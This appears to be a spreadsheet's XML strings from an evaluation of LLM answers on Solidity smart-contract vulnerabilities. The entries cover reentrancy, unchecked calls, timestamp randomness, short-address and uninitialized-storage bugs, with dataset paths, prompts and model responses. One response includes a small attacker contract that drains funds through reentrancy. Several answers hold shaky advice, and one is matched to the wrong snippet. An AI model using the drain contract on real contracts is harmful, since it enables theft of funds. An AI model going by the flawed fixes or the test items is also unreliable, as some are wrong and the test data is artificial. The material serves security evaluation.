a. **Reentrancy Attack**: The function uses the `send` method to send ether without checking its return value. Although `send` only provides a limited amount of gas (2300 gas) and thus limits the called contract in what it can do (e.g., no further state changes), it's still possible to exploit in certain scenarios. If the `msg.sender` is a malicious contract, it can use the fallback function to call `withdrawLeftOver` again before the previous call finishes, leading to a reentrancy attack and draining more funds than intended.
b. **State Variable Order**: The state variable `payedOut` is checked before sending the funds but it's not set within this function. If there's another function in the contract that sets `payedOut` after funds are transferred, it's susceptible to a reentrancy attack. The correct pattern is to change the state first and then send funds.
To mitigate these vulnerabilities:
1. Use the checks-effects-interactions pattern to avoid reentrancy attacks.
2. Always check the return value of `send` or prefer to use the `transfer` method which throws an error if the transfer fails.</t>
  </si>
  <si>
    <t>"1. Is there any vulnerabilities? Yes.
2. Explain in details how this vulnerability can be exploited:
The vulnerability lies in the use of `msg.sender.send(amountToWithdraw);`. The `send` method is used to transfer funds to the `msg.sender`, but it does not provide any error handling mechanism. If the transfer fails (e.g., due to out-of-gas issues or the recipient contract's fallback function consuming too much gas), the transaction will be reverted, and the user will not receive their funds.
3. The business impact of this vulnerability in one sentence:
This function leads to potential loss of user funds if the `send` method fails during the withdrawal process, resulting in frustrated users and potential reputation damage.
4. The potential solutions to this vulnerability:
- Instead of using `send`, the function should use `transfer` to handle the transfer of funds. The `transfer` method will automatically revert the transaction if the transfer fails, ensuring that funds are not lost.
- Implement a withdrawal pattern where users can withdraw their funds in a two-step process: first, they initiate the withdrawal, and then the funds can be claimed by the user through a separate action. This approach allows for better error handling and user feedback.
- Consider using a more secure and well-audited smart contract library or standard, like the OpenZeppelin's `SafeMath` library, which mitigates potential overflow/underflow vulnerabilities and includes safer transfer functions.
Note: Always ensure your smart contracts handle errors gracefully to prevent potential financial losses and security risks."</t>
  </si>
  <si>
    <t>dataset/unchecked_low_level_calls/mishandled.sol</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? Yes.
2. Explain in details how this vulnerability can be exploited: This piece of code suffers from a reentrancy vulnerability. The problem occurs because the balance (`userBalances[msg.sender]`) of the sender is set to zero only after the funds are sent. If the receiver of the funds is a malicious contract, it can be written in a way that it calls back into `withdrawBalance` before `msg.sender.send(amountToWithdraw)` has finished. This means the malicious contract could drain more Ether than it should be allowed to.
Here's a simple example of a malicious contract that could exploit this vulnerability:
```solidity
contract MaliciousContract {
    VulnerableContract vc;
    function MaliciousContract(address vulnerableContractAddress) {
        vc = VulnerableContract(vulnerableContractAddress);
    }
    function () payable {
        if (vc.balance &gt; 0) {
            vc.withdrawBalance();
        }
    }
    function drain() {
        vc.withdrawBalance();
    }
}
```
3. The business impact of this vulnerabilities in one sentence: The `withdrawBalance` function leads to potential theft of all contract funds by a malicious actor.
4. The potential solutions of this vulnerabilities: To fix this vulnerability, it's important to employ the Checks-Effects-Interactions pattern in Solidity, which recommends that you make any state changes before calling other contracts. You should also consider using the `transfer` function instead of `send` as `transfer` throws an error if the call fails, whereas `send` returns a boolean. Here's a safer way to write the function:
```solidity
function withdrawBalance() {
    uint amountToWithdraw = userBalances[msg.sender];
    require(amountToWithdraw &gt; 0);
    userBalances[msg.sender] = 0;
    (bool success, ) = msg.sender.call.value(amountToWithdraw)("");
    require(success, "Transfer failed.");
}
```
This way, the balance is set to zero before the funds are transferred, which protects against reentrancy attacks. In addition, if the transfer fails, an error is thrown and the transaction is reverted, which includes the state change.</t>
  </si>
  <si>
    <t>1. Vulnerabilities: Yes.
2. Proof of concept: The vulnerability in this code is the unchecked use of the `.call()` method, which can lead to potential reentrancy attacks.
3. Business impact: This function leads to reentrancy vulnerability, where an attacker could repeatedly call this function and potentially exploit other parts of the contract during the ongoing execution.
4. Potential solutions:
   - Use the `send()` method instead of `call()` to prevent reentrancy vulnerability.
   - Implement the "Checks-Effects-Interactions" pattern to separate state changes from external calls and prevent reentrancy attacks.
   - Consider using the latest Solidity version with the security patches, as newer versions may address some vulnerabilities.</t>
  </si>
  <si>
    <t>dataset/unchecked_low_level_calls/unchecked_return_value.sol</t>
  </si>
  <si>
    <t xml:space="preserve">  function callnotchecked(address callee) public {
    callee.call();
  }
Understand this code and analyze it, respond me in this format  (fill in the part with ___): 1. Is there any vulnerabilities? give me a short answer in the beginning of your response,choose one from the following three: yes, no, or not sure. If your answer is no, stop here; If your choice is yes, 2. Explain in details how this vulnerability can be exploited:_______. 3. The business impact of this vulnerabilities in one sentence: ___ function leads to _____. 4.The potential solutions of this vulnerabilities:_________. Note: You can state more than one lines which have this vulnerability! This is a short extraction of the solidity code and please assume all the variables in this code have been defined. Please ignore the spelling problem.</t>
  </si>
  <si>
    <t>1. Yes, there are vulnerabilities in this code.
2. how this vulnerability can be exploited :
The vulnerabilities present in this code are related to the unchecked return value of a `call()` function and lack of control over the code being executed at the target address. 
The `call()` function in Solidity is a low-level function that directly interacts with other contracts. It returns a boolean indicating whether the operation was successful, but in this function, the return value is not checked, which can lead to unexpected behavior if the call fails.
Furthermore, `call()` gives the called contract almost unlimited control, including the ability to run an arbitrary amount of computation (gas). A malicious contract could potentially exploit this to perform a re-entrancy attack, among other things.
3. The business impact of these vulnerabilities in one sentence:
The `callnotchecked` function leads to potential unchecked contract execution failure and allows for potential re-entrancy attacks, which can result in loss of funds or other unexpected behavior.
4. The potential solutions of these vulnerabilities:
- Always check the return value of `call()` function. If the call fails, the contract should handle it properly, potentially by reverting the transaction.
- Instead of using the `call()` function, consider using Solidity's `call` with a function signature or an Interface to interact with other contracts. This way, you can limit the actions that can be taken to those defined in the interface.
- Limit the amount of gas forwarded in a call to prevent the called contract from consuming all gas.
- Use a re-entrancy guard to prevent re-entrancy attacks. This can be done by using a state variable that locks the contract while a function is being executed.
Here's an example of how the function could be updated:
```solidity
bool locked = false;
modifier noReentrancy() {
    require(!locked, "Reentrant call");
    locked = true;
    _;
    locked = false;
}
function callChecked(address payable callee) public noReentrancy {
    (bool success,) = callee.call{value: msg.value, gas: 5000}("");
    require(success, "Call failed");
}
```
In this version, a re-entrancy guard is used to prevent recursive calls, the return value of `call()` is checked and handled properly, and a limited amount of gas is forwarded to the called contract.</t>
  </si>
  <si>
    <t>dataset/time_manipulation/ether_lotto.sol</t>
  </si>
  <si>
    <t xml:space="preserve"> function play() payable {
        // Participants must spend some fixed ether before playing lottery.
        assert(msg.value == TICKET_AMOUNT);
        // Increase pot for each participant.
        pot += msg.value;
        var random = uint(sha3(block.timestamp)) % 2;
        // Distribution: 50% of participants will be winners.
        if (random == 0) {
            // Send fee to bank account.
            bank.transfer(FEE_AMOUNT);
            // Send jackpot to winner.
            msg.sender.transfer(pot - FEE_AMOUNT);
            // Restart jackpot.
            pot = 0;
        }
    }
</t>
  </si>
  <si>
    <t>I'll start by reading and analyzing the provided Solidity code.
1. Are there any vulnerabilities?
**Answer:** Yes.
2. how this vulnerability can be exploited :
The vulnerability is located at the line:
```
var random = uint(sha3(block.timestamp)) % 2;
```
This line uses `block.timestamp` as a source of randomness to determine if a participant wins or not. Since `block.timestamp` is manipulable by miners, it is not a secure source of randomness.
3. The business impact of these vulnerabilities in one sentence:
Using `block.timestamp` for randomness can be manipulated by miners, which may lead to an unfair advantage in the lottery.
4. The potential solutions of these vulnerabilities:
- Use an oracle or external source of randomness.
- Implement a commit-reveal scheme where participants submit a hash of their number and a secret, followed by revealing the secret later. This way, the outcome cannot be determined until all participants have committed.
- Use the blockhash of a future block, but remember that it's only secure for the last 256 blocks.</t>
  </si>
  <si>
    <t>1. Yes, there are vulnerabilities in this code.
2. how this vulnerability can be exploited :
   - **Reentrancy Attack**: This is one of the most common attacks on smart contracts. In this case, the contract calls `msg.sender.transfer(pot - FEE_AMOUNT);` before resetting the `pot` variable to `0`. If `msg.sender` is a malicious contract that implements a fallback function that calls back into the `play` function, it could drain the contract's balance.
   - **Block Timestamp Manipulation**: The contract relies on `block.timestamp` for generating a pseudo-random number. Miners have some level of control over the block's timestamp, thus they could manipulate the outcome of the lottery.
3. The business impact of these vulnerabilities in one sentence:
   - The `play` function leads to potential theft of funds due to a reentrancy attack and unfair outcomes due to block timestamp manipulation.
4. The potential solutions of these vulnerabilities:
   - **Reentrancy Attack Solution**: To prevent a reentrancy attack, the `pot` variable should be reset before the transfer call. Alternatively, you could use a mutex or reentrancy guard to ensure that the contract cannot be re-entered while it is still executing a previous call.
   - **Block Timestamp Manipulation Solution**: For the randomness issue, a better option would be to use an external oracle to provide randomness or use commit-reveal schemes. This way, the contract does not rely on the block's timestamp, which can be manipulated by miners to some extent.</t>
  </si>
  <si>
    <t>Alright, I'll start by reviewing the provided Solidity code. After analyzing it, I will answer your questions in the format you've provided.
1. Are there any time manipulation vulnerabilities? 
**Answer:** yes.
2. how this vulnerability can be exploited :
The vulnerability exists in the line:
\[
\text{{var random = uint(sha3(block.timestamp)) \% 2;}}
\]
The code is using `block.timestamp` as a source of randomness. Miners have some control over this value, meaning they can manipulate it to affect the outcome of the lottery.
3. The business impact of these vulnerabilities in one sentence:
The use of `block.timestamp` as a source of randomness in the lottery function leads to potential miner manipulation, undermining the fairness of the lottery.
4. The potential solutions to these vulnerabilities:
- Avoid using `block.timestamp` as a source of randomness. Instead, consider using other mechanisms, like commit-reveal schemes.
- Implement an oracle-based randomness generator, where an external trusted source provides the random number.
- Use VRF (Verifiable Random Function) if it's available and appropriate for the use case, ensuring the randomness is both unpredictable and provably fair.</t>
  </si>
  <si>
    <t>dataset/time_manipulation/governmental_survey.sol</t>
  </si>
  <si>
    <t>function invest() {
    if (msg.value&lt;jackpot/2) throw;
    lastInvestor = msg.sender;
    jackpot += msg.value/2;
    lastInvestmentTimestamp = block.timestamp;
  }
Understand this code and analyze it, respond me in this format  (fill in the part with ___): 1. Is there any vulnerabilities? give me a short answer in the beginning of your response,choose one from the following three: yes, no, or not sure. If your answer is no, stop here; If your choice is yes, 2. Explain in details how this vulnerability can be exploited:_______. 3. The business impact of this vulnerabilities in one sentence: ___ function leads to _____. 4.The potential solutions of this vulnerabilities:_________. Note: You can state more than one lines which have this vulnerability! This is a short extraction of the solidity code and please assume all the variables in this code have been defined. Please ignore the spelling problem.</t>
  </si>
  <si>
    <t>Alright, I'll start by reviewing the provided Solidity code. After analyzing it, I will answer your questions in the format you've provided.
1. Are there any time manipulation vulnerabilities? 
**Answer:** yes.
2. how this vulnerability can be exploited :
The vulnerability exists in the line:
\[
\text{{var random = uint(sha3(block.timestamp)) \% 2;}}
\]
The code is using `block.timestamp` as a source of randomness. Miners have some control over this value, meaning they can manipulate it to affect the outcome of the lottery.
3. The business impact of these vulnerabilities in one sentence:
The use of `block.timestamp` as a source of randomness in the lottery function leads to potential miner manipulation, undermining the fairness of the lottery.
4. The potential solutions to these vulnerabilities:
- Avoid using `block.timestamp` as a source of randomness. Instead, consider using other mechanisms, like commit-reveal schemes.
- Implement an oracle-based randomness generator, where an external trusted source provides the random number.
- Use VRF (Verifiable Random Function) if it's available and appropriate for the use case, ensuring the randomness is both unpredictable and provably fair.</t>
  </si>
  <si>
    <t>dataset/time_manipulation/roulette.sol</t>
  </si>
  <si>
    <t xml:space="preserve">  function () public payable {
        require(msg.value == 10 ether); // must send 10 ether to play
        // &lt;yes&gt; &lt;report&gt; TIME_MANIPULATION
        require(now != pastBlockTime); // only 1 transaction per block
        // &lt;yes&gt; &lt;report&gt; TIME_MANIPULATION
        pastBlockTime = now;
        if(now % 15 == 0) { // winner
            msg.sender.transfer(this.balance);
        }
    }
}
Understand this code and analyze it, respond me in this format  (fill in the part with ___): 1. Is there any vulnerabilities? give me a short answer in the beginning of your response,choose one from the following three: yes, no, or not sure. If your answer is no, stop here; If your choice is yes, 2. Explain in details how this vulnerability can be exploited:_______. 3. The business impact of this vulnerabilities in one sentence: ___ function leads to _____. 4.The potential solutions of this vulnerabilities:_________. Note: You can state more than one lines which have this vulnerability! This is a short extraction of the solidity code and please assume all the variables in this code have been defined. Please ignore the spelling problem.</t>
  </si>
  <si>
    <t>dataset/time_manipulation/timed_crowdsale.sol</t>
  </si>
  <si>
    <t>dataset/short_addresses/short_address_example.sol</t>
  </si>
  <si>
    <t>function sendCoin(address to, uint amount) returns(bool sufficient) {
         if (balances[msg.sender] &lt; amount) return false;
         balances[msg.sender] -= amount;
         balances[to] += amount;
         Transfer(msg.sender, to, amount);
         return true;
     }</t>
  </si>
  <si>
    <t>Let's start by reading and analyzing the provided Solidity code.
Here is the Solidity code you provided:
```solidity
pragma solidity ^0.4.11;
contract MyToken {
    mapping (address =&gt; uint) balances;
    event Transfer(address indexed _from, address indexed _to, uint256 _value);
    function MyToken() {
        balances[tx.origin] = 10000;
    }
    function sendCoin(address to, uint amount) returns(bool sufficient) {
        if (balances[msg.sender] &lt; amount) return false;
        balances[msg.sender] -= amount;
        balances[to] += amount;
        Transfer(msg.sender, to, amount);
        return true;
    }
    function getBalance(address addr) constant returns(uint) {
        return balances[addr];
    }
}
```
1. **Are there any vulnerabilities?**
Yes.
2. **how this vulnerability can be exploited :** 
The vulnerability in this code is the potential for a "short address attack." Specifically, if an attacker sends a transaction with a malformed `to` address (with one or more bytes missing at the end), Ethereum's ABI (Application Binary Interface) will interpret the missing bytes from the next parts of the input data (in this case, the `amount` field). This can lead to unexpected behavior. The line in question is:
```solidity
balances[to] += amount;
```
3. **The business impact of these vulnerabilities in one sentence:** 
The `sendCoin` function leads to potential loss or theft of tokens due to a short address attack.
4. **The potential solutions of this vulnerabilities:**
To mitigate this vulnerability:
- Always ensure the `to` address length is exactly 20 bytes before processing the transaction.
- Use the `require` function to validate the length of the `to` address before making any state changes or performing arithmetic operations.
- Update to a newer version of the Solidity compiler, as newer versions often come with built-in protections against known vulnerabilities.
Would you like a more detailed explanation or any further assistance on this topic?</t>
  </si>
  <si>
    <t>Alright, I'll begin by reading the provided Solidity code and then proceed with the analysis.
Here's the Solidity code you provided:
```solidity
pragma solidity ^0.4.11;
contract MyToken {
    mapping (address =&gt; uint) balances;
    event Transfer(address indexed _from, address indexed _to, uint256 _value);
    function MyToken() {
        balances[tx.origin] = 10000;
    }
    function sendCoin(address to, uint amount) returns(bool sufficient) {
        if (balances[msg.sender] &lt; amount) return false;
        balances[msg.sender] -= amount;
        balances[to] += amount;
        Transfer(msg.sender, to, amount);
        return true;
    }
    function getBalance(address addr) constant returns(uint) {
        return balances[addr];
    }
}
```
I'll now analyze this code, especially focusing on the short address vulnerability.
1. Are there any short address vulnerabilities? 
Answer: **Yes**
2. how this vulnerability can be exploited :
The vulnerability exists in the `sendCoin` function. Specifically, the line:
```solidity
balances[to] += amount;
```
When a malformed (short) address is used as the `to` address during a `sendCoin` call, the actual amount being sent can be shifted due to the missing bytes in the address. This can lead to the recipient receiving more tokens than intended. 
For instance, if an address is expected to be 20 bytes but is only 19 bytes due to a missing byte, and an attacker sends `1` token to this address, the actual value sent could be `256` tokens (due to the byte shift).
3. The business impact of these vulnerabilities in one sentence:
The `sendCoin` function leads to unintended token transfers when a short address is used.
4. The potential solutions to this vulnerability:
- Always check the length of the address to ensure it's 20 bytes before performing any operations.
- It's also crucial to ensure that the client-side software (e.g., wallets) sends full 20-byte addresses.
- Upgrade to a newer version of Solidity that doesn't have this vulnerability. The provided code uses Solidity version 0.4.11, which is quite old. Newer versions have made improvements in this area.</t>
  </si>
  <si>
    <t>open_address_lottery.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function forceReseed() { //reseed initiated by the owner - for testing purposes
        require(msg.sender==owner);
        SeedComponents s;
        s.component1 = uint(msg.sender);
        s.component2 = uint256(block.blockhash(block.number - 1));
        s.component3 = block.difficulty*(uint)(block.coinbase);
        s.component4 = tx.gasprice * 7;
        reseed(s); //reseed
    }</t>
  </si>
  <si>
    <t>"Alright, I'll start by reading and analyzing the provided Solidity code.
The provided code appears to be a Solidity contract for a distributed lottery. The contract chooses random addresses as ""lucky addresses."" If these addresses participate, they receive the jackpot, which is 7 times the price of their bet. An address can only win once. The owner of the contract can reseed the secret seed, which determines the lucky addresses.
From the brief snippet provided:
- It uses Solidity version ^0.4.19.
- It maintains a secret seed to determine winners.
- A lucky number is set to 7.
- There's a mapping to keep track of addresses that have already won.
- There's a function for participation which checks the ticket price and whether the participant has won before.
I'll continue to analyze the entire code to identify any vulnerabilities.
1. Are there any vulnerabilities? 
**Yes**.
2. how this vulnerability can be exploited :
- **No Visibility Specified**: Some functions in the contract do not specify their visibility (public, private, internal, external). This can lead to unintended exposure of functions that might be meant for internal use only. Without specifying the visibility, functions default to `public`, meaning they can be called externally. This can potentially expose sensitive operations or allow unauthorized access.
- **Block Information Dependency**: The contract uses block attributes (e.g., `block.timestamp`, `block.coinbase`, `block.difficulty`, `block.gaslimit`). This can be a concern because miners have some influence over these values. Depending on the nature of the lottery, a miner might be able to game the system by manipulating these values, especially if the potential rewards from the lottery are greater than the mining rewards.
- **Integer Overflow/Underflow**: Arithmetic operations in the contract are not protected against integer overflow or underflow. Without proper checks or the use of libraries like SafeMath, this can lead to unintended consequences, such as incorrect balances or logic failures.
It's worth noting that while these vulnerabilities are potential concerns, the exact risk they pose would require a deeper analysis in the context of the entire contract's logic and functionality."</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes**.
2. how this vulnerability can be exploited :
   a. The function `forceReseed()` can only be called by the `owner` but uses the `msg.sender` (which is the owner's address) as a seed component. This means every time the owner calls this function, `s.component1` will always have the same value.
   b. `block.blockhash(block.number - 1)` is considered deterministic after 256 blocks. Using it as a seed component might not provide a unique or unpredictable value after that period.
   c. Multiplying `block.difficulty` by `block.coinbase` (s.component3) can introduce predictability since `block.coinbase` is the address of the miner or staking validator and might be known or controlled by potential attackers.
   d. Using `tx.gasprice` as a seed (even when multiplied by 7) can be influenced by the sender by setting a specific gas price when calling the function.
3. The business impact of these vulnerabilities in one sentence:
   Using predictable or manipulatable values in the `forceReseed()` function leads to potential vulnerabilities in the randomness generation process.
4. The potential solutions of these vulnerabilities:
   a. Remove `s.component1 = uint(msg.sender);` or replace it with a more unpredictable value.
   b. Ensure that `block.blockhash(block.number - 1)` is used in a way that accounts for its determinism after 256 blocks. Consider using other sources of entropy.
   c. Reconsider the usage of `block.coinbase` or combine it with other sources of entropy that are less predictable.
   d. Be cautious when using `tx.gasprice` as part of the seeding mechanism. Consider combining it with other sources of entropy or using mechanisms that make it harder for an attacker to manipulate the seed by changing the gas price.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Answer: yes.
2. how this vulnerability can be exploited :
a. **Predictable Randomness:** The function `forceReseed` seems to be an attempt to generate entropy for a random seed. However, several components of the seed are either predictable or can be influenced by external actors:
- `s.component1 = uint(msg.sender);` 
  This is merely the address of the sender, which is publicly known.
- `s.component2 = uint256(block.blockhash(block.number - 1));`
  The blockhash of the last block is public information.
- `s.component3 = block.difficulty*(uint)(block.coinbase);`
  Both the block difficulty and the coinbase (miner's address) are publicly known.
- `s.component4 = tx.gasprice * 7;`
  The gas price of the transaction is set by the sender and is publicly known.
b. **Ownership Check:** 
There is a `require(msg.sender==owner);` line which ensures that only the owner can call this function. However, the code does not provide the initialization or declaration of the `owner` variable, which can be a potential oversight. If `owner` is not initialized properly in the constructor or elsewhere, it could be a vulnerability.
c. **Blockhash Age:** 
The code tries to access the blockhash of the previous block using `block.blockhash(block.number - 1)`. This isn't inherently a vulnerability, but it's worth noting that blockhashes are only available for the 256 most recent blocks. Trying to access a blockhash older than that would return zero, potentially causing issues with the entropy.
d. **No Visibility Specified:** 
The function does not have a visibility specifier like `public`, `private`, or `internal`. By default, the function would be `public`, but it's a good practice to specify it explicitly for clarity and to prevent potential misuse.
To enhance the security of the `forceReseed` function:
- Avoid relying solely on block and transaction properties for randomness, as they can be manipulated or are publicly known.
- Ensure that the owner is properly initialized and that only the owner can call this function.
- Specify the visibility of the function for clarity.</t>
  </si>
  <si>
    <t>dataset/other/crypto_roulette.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function play(uint256 number) payable public {
        require(msg.value &gt;= betPrice &amp;&amp; number &lt;= 10);
        Game game; //Uninitialized storage pointer
        game.player = msg.sender;
        game.number = number;
        gamesPlayed.push(game);
        if (number == secretNumber) {
            // win!
            msg.sender.transfer(this.balance);
        }
        shuffle();
        lastPlayed = now;
    }
  </t>
  </si>
  <si>
    <t>Alright, I will begin by examining the provided Solidity code file named "crypto_roulette.sol". After reviewing the code, I will determine if there are any vulnerabilities and provide the requested analysis.
Here's a summary of the contract named `CryptoRoulette`:
1. The contract allows a user to guess a number that's secretly stored in the blockchain.
2. A new number is randomly chosen after each guess.
3. To play, users must call the `play()` method with a guessed number between 1 and 10 and pay a bet price of 0.1 ether.
4. If the user guesses the correct number, they win the entire balance of the contract.
5. The contract has a `kill()` method that allows the contract owner to destroy the contract if no one has played in the last day.
Now, let's analyze the code for vulnerabilities:
1. **Are there any vulnerabilities?** 
   Yes.
2. **how this vulnerability can be exploited :**
   - **Predictable Random Number Generation**: The method `shuffle()` generates the `secretNumber` using the `sha3` hashing function based on the current timestamp (`now`) and the previous block's hash (`block.blockhash(block.number-1)`). Since miners can influence the block hash and potentially see the transaction that's about to be mined, they can manipulate or predict the outcome. This means that an attacker, especially one with mining capabilities, can predict or influence the `secretNumber`.
   - **Overflow/Underflow**: The contract does not use SafeMath or similar precautions to prevent integer overflow/underflow. However, in this specific contract, there doesn't seem to be a direct exploitation point for overflow/underflow.
   - **Deprecated Functions &amp; Versioning**: The contract uses the `^0.4.19` compiler version, which is quite outdated. This version contains known vulnerabilities and does not benefit from newer security features and optimizations. Additionally, the contract uses `suicide(msg.sender)`, which has been deprecated in favor of `selfdestruct(msg.sender)`.
   - **Limitation on Guess Range**: The `play()` function restricts users to only guessing numbers up to 10 (`number &lt;= 10`), but the `secretNumber` can be between 1 and 20. This makes it impossible for users to guess numbers between 11 and 20, which is misleading based on the contract's introductory comments.
These vulnerabilities can expose the contract to potential attacks, especially the predictable random number generation, which can be exploited by attackers to win the game consistently.</t>
  </si>
  <si>
    <t>Alright, let's start by examining the provided Solidity code to identify any vulnerabilities.
1. Are there any vulnerabilities?
Answer: Yes.
2. how this vulnerability can be exploited :
- **Unpredictable Randomness**:
  In the `shuffle()` function, the `secretNumber` is generated using the `sha3(now, block.blockhash(block.number-1))` method. This approach is predictable because it relies on block variables (`now` and `blockhash`), which can be influenced by miners.
  Line with vulnerability: 
  `secretNumber = uint8(sha3(now, block.blockhash(block.number-1))) % 20 + 1;`
- **Underflow**:
  In the `play(uint256 number)` function, the requirement ensures that the guessed `number` is less than or equal to 10, but there is no check to ensure that `number` is greater than or equal to 1. This can lead to underflows.
  Line with vulnerability:
  `require(msg.value &gt;= betPrice &amp;&amp; number &lt;= 10);`
- **Outdated Solidity Version**:
  The contract uses an outdated Solidity version (`^0.4.19`), which may be prone to known vulnerabilities that have been fixed in later versions.
  Line with vulnerability:
  `pragma solidity ^0.4.19;`
3. The business impact of these vulnerabilities:
- **Unpredictable Randomness**: Predictable secret number generation leads to easier winning by attackers.
- **Underflow**: Players can provide a number outside the expected range, leading to unexpected behavior.
- **Outdated Solidity Version**: Using an outdated version exposes the contract to known vulnerabilities.
4. The potential solutions for these vulnerabilities:
- **Unpredictable Randomness**: 
  - Use an off-chain solution for generating random numbers, such as an oracle.
  - Use commit-reveal schemes where users send hashes of their numbers and later reveal them.
- **Underflow**:
  - Add a check to ensure that the provided number is within the desired range, i.e., `1 &lt;= number &lt;= 10`.
- **Outdated Solidity Version**:
  - Upgrade to a newer, stable version of Solidity and review the contract for any additional changes or improvements that need to be made.</t>
  </si>
  <si>
    <t>1.** Are there any vulnerabilities?** : No</t>
  </si>
  <si>
    <t>"Alright, let's start by examining the provided Solidity code to identify any vulnerabilities.
1. Are there any vulnerabilities?
Answer: Yes.
2. how this vulnerability can be exploited :
- **Unpredictable Randomness**:
  In the `shuffle()` function, the `secretNumber` is generated using the `sha3(now, block.blockhash(block.number-1))` method. This approach is predictable because it relies on block variables (`now` and `blockhash`), which can be influenced by miners.
  Line with vulnerability: 
  `secretNumber = uint8(sha3(now, block.blockhash(block.number-1))) % 20 + 1;`
- **Underflow**:
  In the `play(uint256 number)` function, the requirement ensures that the guessed `number` is less than or equal to 10, but there is no check to ensure that `number` is greater than or equal to 1. This can lead to underflows.
  Line with vulnerability:
  `require(msg.value &gt;= betPrice &amp;&amp; number &lt;= 10);`
- **Outdated Solidity Version**:
  The contract uses an outdated Solidity version (`^0.4.19`), which may be prone to known vulnerabilities that have been fixed in later versions.
  Line with vulnerability:
  `pragma solidity ^0.4.19;`
3. The business impact of these vulnerabilities:
- **Unpredictable Randomness**: Predictable secret number generation leads to easier winning by attackers.
- **Underflow**: Players can provide a number outside the expected range, leading to unexpected behavior.
- **Outdated Solidity Version**: Using an outdated version exposes the contract to known vulnerabilities.
4. The potential solutions for these vulnerabilities:
- **Unpredictable Randomness**: 
  - Use an off-chain solution for generating random numbers, such as an oracle.
  - Use commit-reveal schemes where users send hashes of their numbers and later reveal them.
- **Underflow**:
  - Add a check to ensure that the provided number is within the desired range, i.e., `1 &lt;= number &lt;= 10`.
- **Outdated Solidity Version**:
  - Upgrade to a newer, stable version of Solidity and review the contract for any additional changes or improvements that need to be made."</t>
  </si>
  <si>
    <t>dataset/other/name_registrar.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function register(bytes32 _name, address _mappedAddress) public {
        NameRecord newRecord;
        newRecord.name = _name;
        newRecord.mappedAddress = _mappedAddress;
        resolve[_name] = _mappedAddress;
        registeredNameRecord[msg.sender] = newRecord;
        require(unlocked); // only allow registrations if contract is unlocked
    }</t>
  </si>
  <si>
    <t>Let's begin by reviewing the content of the provided Solidity file `name_registrar.sol`.
Here's the content of the provided `name_registrar.sol`:
```solidity
pragma solidity ^0.4.15;
contract NameRegistrar {
    bool public unlocked = false;  // registrar locked, no name updates
    struct NameRecord { // map hashes to addresses
        bytes32 name;
        address mappedAddress;
    }
    mapping(address =&gt; NameRecord) public registeredNameRecord; // records who registered names
    mapping(bytes32 =&gt; address) public resolve; // resolves hashes to addresses
    function register(bytes32 _name, address _mappedAddress) public {
        NameRecord newRecord;
        newRecord.name = _name;
        newRecord.mappedAddress = _mappedAddress;
        resolve[_name] = _mappedAddress;
        registeredNameRecord[msg.sender] = newRecord;
        require(unlocked); // only allow registrations if contract is unlocked
    }
}
```
### Analysis:
1. Are there any vulnerabilities?
Answer: **Yes**.
2. how this vulnerability can be exploited :
- **State Variable Ordering**: The state variable `unlocked` is checked after the state changes (`resolve` and `registeredNameRecord` mappings) in the `register` function. This means even if `unlocked` is `false`, the state changes will take place before the `require` statement checks the condition. This is a vulnerability as the `register` function can make changes to the contract's state even when the contract is meant to be locked.
- **Potential for Overwriting**: The `register` function allows any user to overwrite the `resolve` mapping for any given `_name`, potentially hijacking the name's resolution. Additionally, any user can overwrite their own `registeredNameRecord` without restrictions, losing the history of their previous registrations.
- **Old Solidity Version**: The contract uses Solidity version 0.4.15, which is outdated. Newer versions of Solidity have introduced various security improvements and fixes for known vulnerabilities. It's recommended to use the latest stable version of Solidity to benefit from these updates.
To address these vulnerabilities, the `require(unlocked);` check should be moved to the beginning of the `register` function, the contract should include logic to prevent overwriting existing entries without proper permissions, and the contract should be updated to use a more recent version of Solidity.</t>
  </si>
  <si>
    <t>Let's start by examining the contents of the provided Solidity code in the file "name_registrar.sol".
Here's the code you provided, presented in a readable format:
```solidity
pragma solidity ^0.4.15;
contract NameRegistrar {
    bool public unlocked = false;  // registrar locked, no name updates
    struct NameRecord { // map hashes to addresses
        bytes32 name;
        address mappedAddress;
    }
    mapping(address =&gt; NameRecord) public registeredNameRecord; // records who registered names
    mapping(bytes32 =&gt; address) public resolve; // resolves hashes to addresses
    function register(bytes32 _name, address _mappedAddress) public {
        NameRecord newRecord;
        newRecord.name = _name;
        newRecord.mappedAddress = _mappedAddress;
        resolve[_name] = _mappedAddress;
        registeredNameRecord[msg.sender] = newRecord;
        require(unlocked); // only allow registrations if contract is unlocked
    }
}
```
Now, let's analyze the code:
1. **Are there any vulnerabilities?**
Yes.
2. **how this vulnerability can be exploited :**
   - The `register` function has a logic flaw where it updates `resolve` and `registeredNameRecord` mappings before checking the `unlocked` state with `require(unlocked);`. This means that even if the registrar is locked (`unlocked = false`), a user can still register a name. The correct behavior would be to check the `unlocked` state before making any changes to the state variables.
3. **The business impact of these vulnerabilities in one sentence:**
   - The flawed `register` function leads to unauthorized name registrations even when the registrar is locked.
4. **The potential solutions to these vulnerabilities:**
   - Move the `require(unlocked);` check to the beginning of the `register` function to ensure that the contract's state is not modified unless it is in the unlocked state.
Would you like a more detailed explanation or any further assistance?</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Answer: **yes**.
2. how this vulnerability can be exploited :
The vulnerability in this code is the order of operations. The `require()` statement that checks whether the contract is unlocked is at the end of the function. This means that the operations above it will execute before this check is made. Specifically, the code will update the `resolve` mapping and the `registeredNameRecord` mapping even if the contract is locked.
A malicious actor could exploit this vulnerability by calling the `register` function even when the contract is locked, and they would successfully update the mappings. The correct approach would be to place the `require(unlocked);` statement at the beginning of the function to ensure that the function doesn't proceed further if the contract is locked.</t>
  </si>
  <si>
    <t>false positive ratio = 0.2857</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</si>
</sst>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b/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="9.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="9.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="9.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="等线"/>
    </font>
  </fonts>
  <fills count="11">
    <fill>
